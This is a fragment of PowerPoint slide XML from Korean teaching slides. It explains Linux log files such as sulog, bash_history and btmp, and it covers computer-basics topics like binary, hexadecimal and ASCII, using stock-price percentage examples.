                        <a:t>아스키파일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, b:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>바이너리파일</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특수행위 플래그</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(C:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>압축</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, U:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>비압축</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, T:tar archive),</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전송방향</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o:out</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> going, i:ingoing), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그인한 사용자의 종류</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a:anonymous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, g:guest,r:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>패스워드인증된사용자</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1490680"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="66396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/var/log/anaconda.log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리눅스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>설치시</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install </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>된 패키지나 과정에 대한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그기록입니다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0645204"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="995947">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sulog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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>su</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명령어를 통한 관리자 권한을 사용한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그기록입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</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만약 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sulog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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파일이 없다면 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>vi /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>syslog.conf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> -&gt; authpriv.info /var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sulog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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설정변경후</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                      </a:endParaRP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etc</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init.d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/syslog reload </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명령으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>syslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>가 설정파일을 다시 읽게 합니다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9612002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="66505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/root/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>bash_history</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </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(root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>유저의 경우</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입력한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>실행명령어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 목록이 저장되는 로그입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>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history </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명렁어로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 내용을 확인 할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33416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btmp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실패한 로그인 시도를 기록하는 로그입니다</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파일이며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>lastb</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명령어로 확인 할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1941964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704233183"/>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컴퓨터기초</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보의표현</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>디지털 데이터</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비트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바이트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이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수</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아스키 코드</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파일</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확장자</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파일헤더</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486130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descr="이진수 - BoB Wiki">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F986FB96-1365-4231-B8AE-B1BACE712A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6811" y="2324145"/>
            <a:ext cx="2421195" cy="182619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격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF14212-76AD-4E2A-8B39-82614B3DBF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42171" y="1104272"/>
            <a:ext cx="1462053" cy="109491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54" name="Picture 6" descr="면접의 본질은 대화 Ⅰ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A65A2F-DE02-4E73-B019-69BFDE5D35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3940" y="3495257"/>
            <a:ext cx="3237488" cy="3237488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="말풍선: 사각형 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C9F9EC-8F84-4798-BDE1-5A5DE8CEBF63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2230789"/>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삼성이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>13% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="말풍선: 사각형 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23A2D9F-4037-4A1C-9A3E-72D98C05A62F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543952" y="2905240"/>
            <a:ext cx="2247007" cy="740529"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21692"/>
              <a:gd name="adj2" fmla="val 64139"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009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카카오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>43.6875% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="손으로 그린 만화 물음표 장식 아이콘 무료 일러스트, 만화, 장식 패턴, 플랫무료 다운로드를위한 PNG 및 PSD 파일">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C275BC06-D573-42C9-A887-06339FB5C7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04224" y="647541"/>
            <a:ext cx="1004190" cy="1004190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="말풍선: 사각형 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9BA036-56CC-4842-BA1D-0678EAA061CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="3426314"/>
            <a:ext cx="2435702" cy="810406"/>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err="1"/>
              <a:t>비트코인은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>-43% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>떨어졌어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519C2B79-3073-4430-9E9D-90253A5F30C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689470" y="1674855"/>
            <a:ext cx="712354" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>양수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8607C0-93B5-4FB9-9A46-5ACC2CFE7C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211428" y="1990874"/>
            <a:ext cx="788300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E967E8A8-41E7-4388-A047-55DEE6313A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999694" y="2831213"/>
            <a:ext cx="788300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>음수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F036A16A-7487-4166-BF5A-9C91FB20F653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444049" y="1654307"/>
            <a:ext cx="788300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문자</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF33C61-881D-4500-B873-1BB6C1EB507D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2035995"/>
            <a:ext cx="171159" cy="288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810B901B-3329-4992-8F43-C97CDF52373A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1726903" y="2065255"/>
            <a:ext cx="142783" cy="2588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AFBA163A-1341-46A6-8CB6-E7EB9821BB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
